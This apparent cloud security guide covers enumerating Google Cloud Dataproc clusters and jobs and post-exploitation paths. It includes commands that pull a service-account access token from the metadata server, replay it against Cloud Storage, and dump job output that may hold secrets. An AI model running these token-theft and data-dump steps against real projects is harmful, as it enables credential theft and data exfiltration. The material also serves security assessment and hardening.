GCP Dataproc Enum
Basic Information
Google Cloud Dataproc is a fully managed service for running Apache Spark, Apache Hadoop, Apache Flink, and other big data frameworks. It is primarily used for data processing, querying, machine learning, and stream analytics. Dataproc enables organizations to create clusters for distributed computing with ease, integrating seamlessly with other Google Cloud Platform (GCP) services like Cloud Storage, BigQuery, and Cloud Monitoring.
Dataproc clusters run on virtual machines (VMs), and the service account associated with these VMs determines the permissions and access level of the cluster.
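If you already have a shell on one of the cluster's nodes, a quick way to confirm which identity the VMs run as is to query the Compute metadata server. A minimal sketch, assuming node access; the endpoints below are the standard metadata paths for the attached service account:
# Service account attached to the node (and therefore to the cluster)
curl -s -H "Metadata-Flavor: Google" \
  "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email"
# OAuth scopes granted to that service account
curl -s -H "Metadata-Flavor: Google" \
  "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes"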
Components
A Dataproc cluster typically includes the following components (a sketch for listing the underlying VMs follows this list):
Master Node: Manages cluster resources and coordinates distributed tasks.
Worker Nodes: Execute distributed tasks.
Service Accounts: Handle API calls and access other GCP services.
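Because the master and worker nodes are ordinary Compute Engine VMs, they can also be enumerated through the Compute API. A minimal sketch, assuming the goog-dataproc-cluster-name label that Dataproc normally applies to its instances:
# List the VMs backing a cluster together with the service account they run as
gcloud compute instances list \
  --filter="labels.goog-dataproc-cluster-name=<cluster-name>" \
  --format="table(name,zone,serviceAccounts[].email)"
The master node usually carries the -m suffix and the workers -w-0, -w-1, and so on.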
Enumeration
Dataproc clusters, jobs, and configurations can be enumerated to gather sensitive information, such as service accounts, permissions, and potential misconfigurations.
Cluster Enumeration
To enumerate Dataproc clusters and retrieve their details:
gcloud dataproc clusters list --region=<region>
gcloud dataproc clusters describe <cluster-name> --region=<region>
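The describe output is verbose, so the fields most useful for assessing the cluster's blast radius can be projected out directly. A sketch using gcloud format projections; the field names follow the Dataproc clusters.get response and are worth verifying against your own output:
# Service account, OAuth scopes and staging bucket of the cluster
# (an empty serviceAccount usually means the default Compute Engine service account is in use)
gcloud dataproc clusters describe <cluster-name> --region=<region> \
  --format="yaml(config.gceClusterConfig.serviceAccount,config.gceClusterConfig.serviceAccountScopes,config.configBucket)"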
Job Enumeration
To enumerate submitted jobs and retrieve their details:
gcloud dataproc jobs list --region=<region>
gcloud dataproc jobs describe <job-id> --region=<region>
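Job descriptions frequently leak useful details such as arguments, script URIs, and the driverOutputResourceUri field pointing at the Cloud Storage location of the driver output. A sketch for pulling that output, assuming read access to the staging bucket (<driver-output-uri> stands for the value returned by the first command):
# Locate a job's driver output in Cloud Storage
gcloud dataproc jobs describe <job-id> --region=<region> \
  --format="value(driverOutputResourceUri)"
# Dump the driver output, which may contain credentials, connection strings or data paths
gsutil cat "<driver-output-uri>*"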
Post Exploitation
Enumerating Dataproc clusters can expose sensitive data, such as tokens, configuration scripts, or job output logs, which can be leveraged for further exploitation. Misconfigured roles or excessive permissions granted to the service account can allow:
Access to sensitive APIs (e.g., BigQuery, Cloud Storage).
Token exfiltration via the metadata server (see the sketch after this list).
Data exfiltration from misconfigured buckets or job logs.
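As an illustration of the token exfiltration path, any code running on a cluster node (an SSH session or a submitted job) can request an OAuth access token for the attached service account from the metadata server and replay it against other GCP APIs. A minimal sketch; <access-token> and <project-id> are placeholders:
# From a shell on a cluster node, request an access token for the attached service account
curl -s -H "Metadata-Flavor: Google" \
  "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"
# Replay the returned access_token against other APIs, e.g. listing Cloud Storage buckets
curl -s -H "Authorization: Bearer <access-token>" \
  "https://storage.googleapis.com/storage/v1/b?project=<project-id>"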